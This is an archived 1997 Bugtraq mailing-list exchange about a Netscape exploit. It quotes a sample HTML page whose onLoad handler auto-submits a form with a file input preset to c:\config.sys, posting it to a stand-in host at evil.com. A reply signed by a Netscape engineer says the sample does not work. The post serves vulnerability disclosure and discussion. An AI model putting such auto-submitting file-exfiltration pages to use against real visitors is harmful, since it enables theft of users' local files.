Lucky Green wrote:
Approved-By: aleph1@UNDERGROUND.ORG
Date: Sat, 14 Jun 1997 19:21:30 -0500
Reply-To: root <root@BACKWATER.PBX.ORG>
Sender: Bugtraq List <BUGTRAQ@NETSPACE.ORG>
From: root <root@BACKWATER.PBX.ORG>
Subject: Netscape Exploit
To: BUGTRAQ@NETSPACE.ORG

Here is a sample. It isn't complete, but you get the basic idea of what is going on.

<HTML><HEAD><TITLE>Evil-DOT-COM Homepage</TITLE></HEAD>
<BODY onLoad="daForm.submit()">
<FORM NAME="daForm" ACTION="http://evil.com/cgi-bin/formmail.pl" METHOD=POST>
<INPUT TYPE=FILE VALUE="c:\config.sys" Name="Save This Document on your Harddrive">
<INPUT TYPE=HIDDEN NAME="recipient" value="foobar@evil.com">

Yeah, that's pretty cool. Too bad it doesn't work.

--
What is appropriate for the master is not appropriate| Tom Weinstein
for the novice. You must understand Tao before       | tomw@netscape.com
transcending structure. -- The Tao of Programming    |